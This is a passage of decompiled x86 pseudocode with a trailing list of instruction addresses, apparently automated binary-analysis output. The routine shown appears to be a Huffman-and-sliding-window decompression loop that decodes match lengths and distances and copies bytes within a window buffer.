                                                                            																		_t645 = _t644 & _t466;
                                                                            																		_t466 = _t466 + 1;
                                                                            																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
                                                                            																		_t598 = _t638 + 0x7c;
                                                                            																		_t644 =  *(_t638 + 0xe6dc);
                                                                            																		 *_t598 =  *_t598 + 0x00000001 & _t644;
                                                                            																		_t632 = _t632 - 1;
                                                                            																		__eflags = _t632;
                                                                            																	} while (_t632 != 0);
                                                                            																	goto L161;
                                                                            																}
                                                                            																L148:
                                                                            																__eflags = _t503 - _t328;
                                                                            																if(_t503 >= _t328) {
                                                                            																	goto L158;
                                                                            																}
                                                                            																L149:
                                                                            																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
                                                                            																_t468 = _t466 + _t333;
                                                                            																_t646 = _t333 + _t503;
                                                                            																 *(_t638 + 0x7c) = _t503 + _t632;
                                                                            																__eflags = _t608 - _t632;
                                                                            																if(_t608 >= _t632) {
                                                                            																	L154:
                                                                            																	__eflags = _t632 - 8;
                                                                            																	if(_t632 < 8) {
                                                                            																		goto L117;
                                                                            																	}
                                                                            																	L155:
                                                                            																	_t347 = _t632 >> 3;
                                                                            																	__eflags = _t347;
                                                                            																	 *(_t658 + 0x30) = _t347;
                                                                            																	_t639 = _t347;
                                                                            																	do {
                                                                            																		L156:
                                                                            																		E001AEA80(_t646, _t468, 8);
                                                                            																		_t658 = _t658 + 0xc;
                                                                            																		_t468 = _t468 + 8;
                                                                            																		_t646 = _t646 + 8;
                                                                            																		_t632 = _t632 - 8;
                                                                            																		_t639 = _t639 - 1;
                                                                            																		__eflags = _t639;
                                                                            																	} while (_t639 != 0);
                                                                            																	goto L116;
                                                                            																}
                                                                            																L150:
                                                                            																_t611 = 8;
                                                                            																__eflags = _t632 - _t611;
                                                                            																if(_t632 < _t611) {
                                                                            																	goto L117;
                                                                            																}
                                                                            																L151:
                                                                            																_t511 = _t632 >> 3;
                                                                            																__eflags = _t511;
                                                                            																do {
                                                                            																	L152:
                                                                            																	_t632 = _t632 - _t611;
                                                                            																	 *_t646 =  *_t468;
                                                                            																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
                                                                            																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
                                                                            																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
                                                                            																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
                                                                            																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
                                                                            																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
                                                                            																	_t356 =  *((intOrPtr*)(_t468 + 7));
                                                                            																	_t468 = _t468 + _t611;
                                                                            																	 *((char*)(_t646 + 7)) = _t356;
                                                                            																	_t646 = _t646 + _t611;
                                                                            																	_t511 = _t511 - 1;
                                                                            																	__eflags = _t511;
                                                                            																} while (_t511 != 0);
                                                                            																goto L117;
                                                                            															} else {
                                                                            																L146:
                                                                            																_push( *(_t638 + 0xe6dc));
                                                                            																_push(_t638 + 0x7c);
                                                                            																_push(_t608);
                                                                            																L71:
                                                                            																_push(_t632);
                                                                            																E001A20EE();
                                                                            																goto L0;
                                                                            																do {
                                                                            																	while(1) {
                                                                            																		L0:
                                                                            																		_t638 = __esi;
                                                                            																		_t598 = __esi + 0x7c;
                                                                            																		do {
                                                                            																			while(1) {
                                                                            																				L1:
                                                                            																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
                                                                            																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
                                                                            																					goto L12;
                                                                            																				} else {
                                                                            																					_t637 = _t638 + 0x8c;
                                                                            																				}
                                                                            																				goto L3;
                                                                            																			}
                                                                            																			goto L103;
                                                                            																		} while (_t632 == 0);
                                                                            																		__eflags =  *((char*)(_t638 + 0x4c44));
                                                                            																		if( *((char*)(_t638 + 0x4c44)) == 0) {
                                                                            																			L106:
                                                                            																			_t537 =  *(_t638 + 0x7c);
                                                                            																			_t614 =  *(_t638 + 0x60);
                                                                            																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
                                                                            																			_t468 = _t537 - _t614;
                                                                            																			__eflags = _t468 - _t399;
                                                                            																			if(_t468 >= _t399) {
                                                                            																				L125:
                                                                            																				__eflags = _t632;
                                                                            																				if(_t632 == 0) {
                                                                            																					while(1) {
                                                                            																						L0:
                                                                            																						_t638 = __esi;
                                                                            																						_t598 = __esi + 0x7c;
                                                                            																						L1:
                                                                            																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
                                                                            																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
                                                                            																							goto L12;
                                                                            																						} else {
                                                                            																							_t637 = _t638 + 0x8c;
                                                                            																						}
                                                                            																					}
                                                                            																				}
                                                                            																				L126:
                                                                            																				_t648 =  *(_t638 + 0xe6dc);
                                                                            																				do {
                                                                            																					L127:
                                                                            																					_t649 = _t648 & _t468;
                                                                            																					_t468 = _t468 + 1;
                                                                            																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
                                                                            																					_t598 = _t638 + 0x7c;
                                                                            																					_t648 =  *(_t638 + 0xe6dc);
                                                                            																					 *_t598 =  *_t598 + 0x00000001 & _t648;
                                                                            																					_t632 = _t632 - 1;
                                                                            																					__eflags = _t632;
                                                                            																				} while (_t632 != 0);
                                                                            																				L161:
                                                                            																				_t643 = _t638 + 4;
                                                                            																				goto L1;
                                                                            																			}
                                                                            																			L107:
                                                                            																			__eflags = _t537 - _t399;
                                                                            																			if(_t537 >= _t399) {
                                                                            																				goto L125;
                                                                            																			}
                                                                            																			L108:
                                                                            																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
                                                                            																			_t468 = _t468 + _t400;
                                                                            																			_t646 = _t400 + _t537;
                                                                            																			 *(_t638 + 0x7c) = _t537 + _t632;
                                                                            																			__eflags = _t614 - _t632;
                                                                            																			if(_t614 >= _t632) {
                                                                            																				L113:
                                                                            																				__eflags = _t632 - 8;
                                                                            																				if(_t632 < 8) {
                                                                            																					L117:
                                                                            																					_t598 = _t638 + 0x7c;
                                                                            																					__eflags = _t632;
                                                                            																					if(_t632 == 0) {
                                                                            																						goto L161;
                                                                            																					}
                                                                            																					L118:
                                                                            																					_t598 = _t638 + 0x7c;
                                                                            																					 *_t646 =  *_t468;
                                                                            																					__eflags = _t632 - 1;
                                                                            																					if(_t632 <= 1) {
                                                                            																						goto L161;
                                                                            																					}
                                                                            																					L119:
                                                                            																					_t598 = _t638 + 0x7c;
                                                                            																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
                                                                            																					__eflags = _t632 - 2;
                                                                            																					if(_t632 <= 2) {
                                                                            																						goto L161;
                                                                            																					}
                                                                            																					L120:
                                                                            																					_t598 = _t638 + 0x7c;
                                                                            																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
                                                                            																					__eflags = _t632 - 3;
                                                                            																					if(_t632 <= 3) {
                                                                            																						goto L161;
                                                                            																					}
                                                                            																					L121:
                                                                            																					_t598 = _t638 + 0x7c;
                                                                            																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
                                                                            																					__eflags = _t632 - 4;
                                                                            																					if(_t632 <= 4) {
                                                                            																						goto L161;
                                                                            																					}
                                                                            																					L122:
                                                                            																					_t598 = _t638 + 0x7c;
                                                                            																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
                                                                            																					__eflags = _t632 - 5;
                                                                            																					if(_t632 <= 5) {
                                                                            																						goto L161;
                                                                            																					}
                                                                            																					L123:
                                                                            																					_t598 = _t638 + 0x7c;
                                                                            																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
                                                                            																					__eflags = _t632 - 6;
                                                                            																					if(_t632 <= 6) {
                                                                            																						goto L161;
                                                                            																					}
                                                                            																					L124:
                                                                            																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
                                                                            																					while(1) {
                                                                            																						L0:
                                                                            																						_t638 = __esi;
                                                                            																						_t598 = __esi + 0x7c;
                                                                            																						goto L1;
                                                                            																					}
                                                                            																				}
                                                                            																				L114:
                                                                            																				_t403 = _t632 >> 3;
                                                                            																				__eflags = _t403;
                                                                            																				 *(_t658 + 0x30) = _t403;
                                                                            																				_t641 = _t403;
                                                                            																				do {
                                                                            																					L115:
                                                                            																					E001AEA80(_t646, _t468, 8);
                                                                            																					_t658 = _t658 + 0xc;
                                                                            																					_t468 = _t468 + 8;
                                                                            																					_t646 = _t646 + 8;
                                                                            																					_t632 = _t632 - 8;
                                                                            																					_t641 = _t641 - 1;
                                                                            																					__eflags = _t641;
                                                                            																				} while (_t641 != 0);
                                                                            																				L116:
                                                                            																				_t638 =  *((intOrPtr*)(_t658 + 0x10));
                                                                            																				goto L117;
                                                                            																			}
                                                                            																			L109:
                                                                            																			_t615 = 8;
                                                                            																			__eflags = _t632 - _t615;
                                                                            																			if(_t632 < _t615) {
                                                                            																				goto L117;
                                                                            																			}
                                                                            																			L110:
                                                                            																			_t539 = _t632 >> 3;
                                                                            																			__eflags = _t539;
                                                                            																			do {
                                                                            																				L111:
                                                                            																				_t632 = _t632 - _t615;
                                                                            																				 *_t646 =  *_t468;
                                                                            																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
                                                                            																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
                                                                            																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
                                                                            																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
                                                                            																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
                                                                            																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
                                                                            																				_t412 =  *((intOrPtr*)(_t468 + 7));
                                                                            																				_t468 = _t468 + _t615;
                                                                            																				 *((char*)(_t646 + 7)) = _t412;
                                                                            																				_t646 = _t646 + _t615;
                                                                            																				_t539 = _t539 - 1;
                                                                            																				__eflags = _t539;
                                                                            																			} while (_t539 != 0);
                                                                            																			goto L117;
                                                                            																		}
                                                                            																		L105:
                                                                            																		_push( *(_t638 + 0xe6dc));
                                                                            																		_push(_t638 + 0x7c);
                                                                            																		_push( *(_t638 + 0x60));
                                                                            																		goto L71;
                                                                            																	}
                                                                            																	L98:
                                                                            																	_t417 = E001A1A0E(_t638, _t658 + 0x1c);
                                                                            																	__eflags = _t417;
                                                                            																} while (_t417 != 0);
                                                                            																goto L99;
                                                                            															}
                                                                            														}
                                                                            														L134:
                                                                            														_t531 = _t638 + (_t322 + 0xb5a) * 4;
                                                                            														while(1) {
                                                                            															L135:
                                                                            															__eflags = _t605 -  *_t531;
                                                                            															if(_t605 <  *_t531) {
                                                                            																break;
                                                                            															}
                                                                            															L136:
                                                                            															_t322 = _t322 + 1;
                                                                            															_t531 = _t531 + 4;
                                                                            															__eflags = _t322 - 0xf;
                                                                            															if(_t322 < 0xf) {
                                                                            																continue;
                                                                            															}
                                                                            															L137:
                                                                            															goto L139;
                                                                            														}
                                                                            														L138:
                                                                            														_t628 = _t322;
                                                                            														goto L139;
                                                                            													}
                                                                            													L132:
                                                                            													_t532 = 0x10;
                                                                            													_t613 = _t605 >> _t532 - _t321;
                                                                            													_t535 = ( *(_t613 + _t638 + 0x2dec) & 0x000000ff) +  *(_t643 + 4);
                                                                            													 *_t643 =  *_t643 + (_t535 >> 3);
                                                                            													 *(_t643 + 4) = _t535 & 0x00000007;
                                                                            													_t326 =  *(_t638 + 0x31ec + _t613 * 2) & 0x0000ffff;
                                                                            													goto L140;
                                                                            												} else {
                                                                            													goto L130;
                                                                            												}
                                                                            												do {
                                                                            													L130:
                                                                            													 *_t493 =  *(_t493 - 4);
                                                                            													_t493 = _t493 - 4;
                                                                            													_t461 = _t461 - 1;
                                                                            													__eflags = _t461;
                                                                            												} while (_t461 != 0);
                                                                            												goto L131;
                                                                            											}
                                                                            											L103:
                                                                            											_t632 =  *(_t638 + 0x74);
                                                                            											_t598 = _t638 + 0x7c;
                                                                            											__eflags = _t632;
                                                                            										}
                                                                            										L97:
                                                                            										_push(_t658 + 0x1c);
                                                                            										_t414 = E001A3564(_t638, _t643);
                                                                            										__eflags = _t414;
                                                                            										if(_t414 == 0) {
                                                                            											goto L99;
                                                                            										}
                                                                            										goto L98;
                                                                            									}
                                                                            									L32:
                                                                            									_t634 = _t460 - 0x106;
                                                                            									__eflags = _t634 - 8;
                                                                            									if(_t634 >= 8) {
                                                                            										_t478 = (_t634 >> 2) - 1;
                                                                            										_t634 = (_t634 & 0x00000003 | 0x00000004) << _t478;
                                                                            										__eflags = _t634;
                                                                            									} else {
                                                                            										_t478 = 0;
                                                                            									}
                                                                            									_t632 = _t634 + 2;
                                                                            									__eflags = _t478;
                                                                            									if(_t478 != 0) {
                                                                            										_t444 = E0019A4ED(_t643);
                                                                            										_t582 = 0x10;
                                                                            										_t632 = _t632 + (_t444 >> _t582 - _t478);
                                                                            										_t585 =  *(_t643 + 4) + _t478;
                                                                            										 *_t643 =  *_t643 + (_t585 >> 3);
                                                                            										_t586 = _t585 & 0x00000007;
                                                                            										__eflags = _t586;
                                                                            										 *(_t643 + 4) = _t586;
                                                                            									}
                                                                            									_t418 = E0019A4ED(_t643);
                                                                            									_t419 =  *(_t638 + 0x1010);
                                                                            									_t617 = _t418 & 0x0000fffe;
                                                                            									__eflags = _t617 -  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4));
                                                                            									if(_t617 >=  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4))) {
                                                                            										L39:
                                                                            										_t479 = 0xf;
                                                                            										_t420 = _t419 + 1;
                                                                            										__eflags = _t420 - _t479;
                                                                            										if(_t420 >= _t479) {
                                                                            											L45:
                                                                            											_t546 =  *(_t643 + 4) + _t479;
                                                                            											 *(_t643 + 4) = _t546 & 0x00000007;
                                                                            											_t422 = _t546 >> 3;
                                                                            											 *_t643 =  *_t643 + _t422;
                                                                            											_t548 = 0x10;
                                                                            											_t551 =  *((intOrPtr*)(_t638 + 0xfd0 + _t479 * 4)) + (_t617 -  *((intOrPtr*)(_t638 + 0xf8c + _t479 * 4)) >> _t548 - _t479);
                                                                            											__eflags = _t551 -  *((intOrPtr*)(_t638 + 0xf8c));
                                                                            											asm("sbb eax, eax");
                                                                            											_t423 = _t422 & _t551;
                                                                            											__eflags = _t423;
                                                                            											_t424 =  *(_t638 + 0x1c14 + _t423 * 2) & 0x0000ffff;
                                                                            											goto L46;
                                                                            										}
                                                                            										L40:
                                                                            										_t575 = _t638 + (_t420 + 0x3e4) * 4;
                                                                            										while(1) {
                                                                            											L41:
                                                                            											__eflags = _t617 -  *_t575;
                                                                            											if(_t617 <  *_t575) {
                                                                            												break;
                                                                            											}
                                                                            											L42:
                                                                            											_t420 = _t420 + 1;
                                                                            											_t575 = _t575 + 4;
                                                                            											__eflags = _t420 - 0xf;
                                                                            											if(_t420 < 0xf) {
                                                                            												continue;
                                                                            											}
                                                                            											L43:
                                                                            											goto L45;
                                                                            										}
                                                                            										L44:
                                                                            										_t479 = _t420;
                                                                            										goto L45;
                                                                            									} else {
                                                                            										L38:
                                                                            										_t576 = 0x10;
                                                                            										_t625 = _t617 >> _t576 - _t419;
                                                                            										_t579 = ( *(_t625 + _t638 + 0x1014) & 0x000000ff) +  *(_t643 + 4);
                                                                            										 *_t643 =  *_t643 + (_t579 >> 3);
                                                                            										 *(_t643 + 4) = _t579 & 0x00000007;
                                                                            										_t424 =  *(_t638 + 0x1414 + _t625 * 2) & 0x0000ffff;
                                                                            										L46:
                                                                            										_t425 = _t424 & 0x0000ffff;
                                                                            										__eflags = _t425 - 4;
                                                                            										if(_t425 >= 4) {
                                                                            											_t643 = (_t425 >> 1) - 1;
                                                                            											_t425 = (_t425 & 0x00000001 | 0x00000002) << _t643;
                                                                            											__eflags = _t425;
                                                                            										} else {
                                                                            											_t643 = 0;
                                                                            										}
                                                                            										_t428 = _t425 + 1;
                                                                            										 *(_t658 + 0x14) = _t428;
                                                                            										_t471 = _t428;
                                                                            										 *(_t658 + 0x30) = _t471;
                                                                            										__eflags = _t643;
                                                                            										if(_t643 == 0) {
                                                                            											L64:
                                                                            											_t643 = _t638 + 4;
                                                                            											goto L65;
                                                                            										} else {
                                                                            											L50:
                                                                            											__eflags = _t643 - 4;
                                                                            											if(__eflags < 0) {
                                                                            												L72:
                                                                            												_t359 = E001A7D76(_t638 + 4);
                                                                            												_t514 = 0x20;
                                                                            												_t471 = (_t359 >> _t514 - _t643) +  *(_t658 + 0x14);
                                                                            												_t517 =  *(_t638 + 8) + _t643;
                                                                            												 *(_t658 + 0x30) = _t471;
                                                                            												_t643 = _t638 + 4;
                                                                            												 *_t643 =  *_t643 + (_t517 >> 3);
                                                                            												 *(_t643 + 4) = _t517 & 0x00000007;
                                                                            												L65:
                                                                            												__eflags = _t471 - 0x100;
                                                                            												if(_t471 > 0x100) {
                                                                            													_t632 = _t632 + 1;
                                                                            													__eflags = _t471 - 0x2000;
                                                                            													if(_t471 > 0x2000) {
                                                                            														_t632 = _t632 + 1;
                                                                            														__eflags = _t471 - 0x40000;
                                                                            														if(_t471 > 0x40000) {
                                                                            															_t632 = _t632 + 1;
                                                                            															__eflags = _t632;
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            												 *(_t638 + 0x6c) =  *(_t638 + 0x68);
                                                                            												 *(_t638 + 0x68) =  *(_t638 + 0x64);
                                                                            												 *(_t638 + 0x64) =  *(_t638 + 0x60);
                                                                            												 *(_t638 + 0x60) = _t471;
                                                                            												__eflags =  *((char*)(_t638 + 0x4c44));
                                                                            												 *(_t638 + 0x74) = _t632;
                                                                            												if( *((char*)(_t638 + 0x4c44)) == 0) {
                                                                            													L73:
                                                                            													_t598 = _t638 + 0x7c;
                                                                            													_t519 =  *_t598;
                                                                            													_t366 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
                                                                            													_t651 = _t519 - _t471;
                                                                            													__eflags = _t651 - _t366;
                                                                            													if(_t651 >= _t366) {
                                                                            														L92:
                                                                            														__eflags = _t632;
                                                                            														if(_t632 == 0) {
                                                                            															goto L161;
                                                                            														}
                                                                            														L93:
                                                                            														_t472 =  *(_t638 + 0xe6dc);
                                                                            														do {
                                                                            															L94:
                                                                            															_t473 = _t472 & _t651;
                                                                            															_t651 = _t651 + 1;
                                                                            															 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)(_t473 +  *((intOrPtr*)(_t638 + 0x4b40))));
                                                                            															_t598 = _t638 + 0x7c;
                                                                            															_t472 =  *(_t638 + 0xe6dc);
                                                                            															 *_t598 =  *_t598 + 0x00000001 & _t472;
                                                                            															_t632 = _t632 - 1;
                                                                            															__eflags = _t632;
                                                                            														} while (_t632 != 0);
                                                                            														goto L161;
                                                                            													}
                                                                            													L74:
                                                                            													__eflags = _t519 - _t366;
                                                                            													if(_t519 >= _t366) {
                                                                            														goto L92;
                                                                            													}
                                                                            													L75:
                                                                            													_t371 =  *((intOrPtr*)(_t638 + 0x4b40));
                                                                            													_t474 = _t371 + _t651;
                                                                            													_t652 = _t371 + _t519;
                                                                            													 *_t598 = _t519 + _t632;
                                                                            													__eflags =  *(_t658 + 0x30) - _t632;
                                                                            													if( *(_t658 + 0x30) >= _t632) {
                                                                            														L80:
                                                                            														__eflags = _t632 - 8;
                                                                            														if(_t632 < 8) {
                                                                            															L84:
                                                                            															__eflags = _t632;
                                                                            															if(_t632 != 0) {
                                                                            																 *_t652 =  *_t474;
                                                                            																__eflags = _t632 - 1;
                                                                            																if(_t632 > 1) {
                                                                            																	 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
                                                                            																	__eflags = _t632 - 2;
                                                                            																	if(_t632 > 2) {
                                                                            																		 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
                                                                            																		__eflags = _t632 - 3;
                                                                            																		if(_t632 > 3) {
                                                                            																			 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
                                                                            																			__eflags = _t632 - 4;
                                                                            																			if(_t632 > 4) {
                                                                            																				 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
                                                                            																				__eflags = _t632 - 5;
                                                                            																				if(_t632 > 5) {
                                                                            																					 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
                                                                            																					__eflags = _t632 - 6;
                                                                            																					if(_t632 > 6) {
                                                                            																						 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
                                                                            																					}
                                                                            																				}
                                                                            																			}
                                                                            																		}
                                                                            																	}
                                                                            																}
                                                                            															}
                                                                            															goto L161;
                                                                            														}
                                                                            														L81:
                                                                            														_t381 = _t632 >> 3;
                                                                            														__eflags = _t381;
                                                                            														 *(_t658 + 0x30) = _t381;
                                                                            														_t640 = _t381;
                                                                            														do {
                                                                            															L82:
                                                                            															E001AEA80(_t652, _t474, 8);
                                                                            															_t658 = _t658 + 0xc;
                                                                            															_t474 = _t474 + 8;
                                                                            															_t652 = _t652 + 8;
                                                                            															_t632 = _t632 - 8;
                                                                            															_t640 = _t640 - 1;
                                                                            															__eflags = _t640;
                                                                            														} while (_t640 != 0);
                                                                            														_t638 =  *((intOrPtr*)(_t658 + 0x10));
                                                                            														_t598 =  *(_t658 + 0x18);
                                                                            														goto L84;
                                                                            													}
                                                                            													L76:
                                                                            													__eflags = _t632 - 8;
                                                                            													if(_t632 < 8) {
                                                                            														goto L84;
                                                                            													}
                                                                            													L77:
                                                                            													_t522 = _t632 >> 3;
                                                                            													__eflags = _t522;
                                                                            													do {
                                                                            														L78:
                                                                            														_t632 = _t632 - 8;
                                                                            														 *_t652 =  *_t474;
                                                                            														 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
                                                                            														 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
                                                                            														 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
                                                                            														 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
                                                                            														 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
                                                                            														 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
                                                                            														_t390 =  *((intOrPtr*)(_t474 + 7));
                                                                            														_t474 = _t474 + 8;
                                                                            														 *((char*)(_t652 + 7)) = _t390;
                                                                            														_t652 = _t652 + 8;
                                                                            														_t522 = _t522 - 1;
                                                                            														__eflags = _t522;
                                                                            													} while (_t522 != 0);
                                                                            													goto L84;
                                                                            												} else {
                                                                            													L70:
                                                                            													_push( *(_t638 + 0xe6dc));
                                                                            													_push(_t638 + 0x7c);
                                                                            													_push(_t471);
                                                                            													goto L71;
                                                                            												}
                                                                            											}
                                                                            											L51:
                                                                            											if(__eflags <= 0) {
                                                                            												_t656 = _t638 + 4;
                                                                            											} else {
                                                                            												_t439 = E001A7D76(_t638 + 4);
                                                                            												_t569 = 0x24;
                                                                            												_t572 = _t643 - 4 +  *(_t638 + 8);
                                                                            												_t656 = _t638 + 4;
                                                                            												_t471 = (_t439 >> _t569 - _t643 << 4) +  *(_t658 + 0x14);
                                                                            												 *_t656 =  *_t656 + (_t572 >> 3);
                                                                            												 *(_t656 + 4) = _t572 & 0x00000007;
                                                                            											}
                                                                            											_t429 = E0019A4ED(_t656);
                                                                            											_t430 =  *(_t638 + 0x1efc);
                                                                            											_t621 = _t429 & 0x0000fffe;
                                                                            											__eflags = _t621 -  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4));
                                                                            											if(_t621 >=  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4))) {
                                                                            												L56:
                                                                            												_t657 = 0xf;
                                                                            												_t431 = _t430 + 1;
                                                                            												__eflags = _t431 - _t657;
                                                                            												if(_t431 >= _t657) {
                                                                            													L62:
                                                                            													_t555 =  *(_t638 + 8) + _t657;
                                                                            													 *(_t638 + 8) = _t555 & 0x00000007;
                                                                            													_t433 = _t555 >> 3;
                                                                            													 *(_t638 + 4) =  *(_t638 + 4) + _t433;
                                                                            													_t557 = 0x10;
                                                                            													_t560 =  *((intOrPtr*)(_t638 + 0x1ebc + _t657 * 4)) + (_t621 -  *((intOrPtr*)(_t638 + 0x1e78 + _t657 * 4)) >> _t557 - _t657);
                                                                            													__eflags = _t560 -  *((intOrPtr*)(_t638 + 0x1e78));
                                                                            													asm("sbb eax, eax");
                                                                            													_t434 = _t433 & _t560;
                                                                            													__eflags = _t434;
                                                                            													_t435 =  *(_t638 + 0x2b00 + _t434 * 2) & 0x0000ffff;
                                                                            													goto L63;
                                                                            												}
                                                                            												L57:
                                                                            												_t562 = _t638 + (_t431 + 0x79f) * 4;
                                                                            												while(1) {
                                                                            													L58:
                                                                            													__eflags = _t621 -  *_t562;
                                                                            													if(_t621 <  *_t562) {
                                                                            														break;
                                                                            													}
                                                                            													L59:
                                                                            													_t431 = _t431 + 1;
                                                                            													_t562 = _t562 + 4;
                                                                            													__eflags = _t431 - 0xf;
                                                                            													if(_t431 < 0xf) {
                                                                            														continue;
                                                                            													}
                                                                            													L60:
                                                                            													goto L62;
                                                                            												}
                                                                            												L61:
                                                                            												_t657 = _t431;
                                                                            												goto L62;
                                                                            											} else {
                                                                            												L55:
                                                                            												_t563 = 0x10;
                                                                            												_t624 = _t621 >> _t563 - _t430;
                                                                            												_t566 = ( *(_t624 + _t638 + 0x1f00) & 0x000000ff) +  *(_t656 + 4);
                                                                            												 *_t656 =  *_t656 + (_t566 >> 3);
                                                                            												 *(_t656 + 4) = _t566 & 0x00000007;
                                                                            												_t435 =  *(_t638 + 0x2300 + _t624 * 2) & 0x0000ffff;
                                                                            												L63:
                                                                            												_t471 = _t471 + (_t435 & 0x0000ffff);
                                                                            												__eflags = _t471;
                                                                            												 *(_t658 + 0x30) = _t471;
                                                                            												goto L64;
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								L28:
                                                                            								__eflags =  *((char*)(_t638 + 0x4c44));
                                                                            								if( *((char*)(_t638 + 0x4c44)) == 0) {
                                                                            									L30:
                                                                            									_t598 = _t638 + 0x7c;
                                                                            									 *( *((intOrPtr*)(_t638 + 0x4b40)) +  *_t598) = _t460;
                                                                            									 *_t598 =  *_t598 + 1;
                                                                            									continue;
                                                                            								}
                                                                            								L29:
                                                                            								 *(_t638 + 0x7c) =  *(_t638 + 0x7c) + 1;
                                                                            								 *(E001A17A5(_t638 + 0x4b44,  *(_t638 + 0x7c))) = _t460;
                                                                            								goto L0;
                                                                            							}
                                                                            						}
                                                                            						L13:
                                                                            						__eflags = _t483 -  *_t598;
                                                                            						if(_t483 ==  *_t598) {
                                                                            							goto L18;
                                                                            						}
                                                                            						L14:
                                                                            						E001A47DA(_t638);
                                                                            						_t415 =  *((intOrPtr*)(_t638 + 0x4c5c));
                                                                            						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c4c));
                                                                            						if(__eflags > 0) {
                                                                            							goto L100;
                                                                            						}
                                                                            						L15:
                                                                            						if(__eflags < 0) {
                                                                            							L17:
                                                                            							__eflags =  *((char*)(_t638 + 0x4c50));
                                                                            							if( *((char*)(_t638 + 0x4c50)) != 0) {
                                                                            								L162:
                                                                            								 *((char*)(_t638 + 0x4c60)) = 0;
                                                                            								goto L100;
                                                                            							}
                                                                            							goto L18;
                                                                            						}
                                                                            						L16:
                                                                            						_t415 =  *((intOrPtr*)(_t638 + 0x4c58));
                                                                            						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c48));
                                                                            						if(_t415 >  *((intOrPtr*)(_t638 + 0x4c48))) {
                                                                            							goto L100;
                                                                            						}
                                                                            						goto L17;
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            0x001a610d
                                                                            0x001a610d
                                                                            0x001a6121
                                                                            0x001a6124
                                                                            0x001a6126
                                                                            0x001a612a
                                                                            0x001a6131
                                                                            0x001a6139
                                                                            0x001a613b
                                                                            0x001a6142
                                                                            0x001a6145
                                                                            0x001a6145
                                                                            0x001a6148
                                                                            0x001a6148
                                                                            0x001a614b
                                                                            0x001a6152
                                                                            0x001a6156
                                                                            0x001a6159
                                                                            0x001a616b
                                                                            0x001a616b
                                                                            0x001a6176
                                                                            0x001a6178
                                                                            0x001a617d
                                                                            0x001a617f
                                                                            0x001a6224
                                                                            0x001a6224
                                                                            0x001a6226
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x00000000
                                                                            0x001a589e
                                                                            0x001a589e
                                                                            0x001a622c
                                                                            0x001a622c
                                                                            0x001a6232
                                                                            0x001a6232
                                                                            0x001a6238
                                                                            0x001a623d
                                                                            0x001a6241
                                                                            0x001a6244
                                                                            0x001a6249
                                                                            0x001a6252
                                                                            0x001a6254
                                                                            0x001a6254
                                                                            0x001a6254
                                                                            0x00000000
                                                                            0x001a6232
                                                                            0x001a6185
                                                                            0x001a6185
                                                                            0x001a6187
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a618d
                                                                            0x001a618d
                                                                            0x001a6193
                                                                            0x001a6195
                                                                            0x001a619b
                                                                            0x001a619e
                                                                            0x001a61a0
                                                                            0x001a61f1
                                                                            0x001a61f1
                                                                            0x001a61f4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a61fa
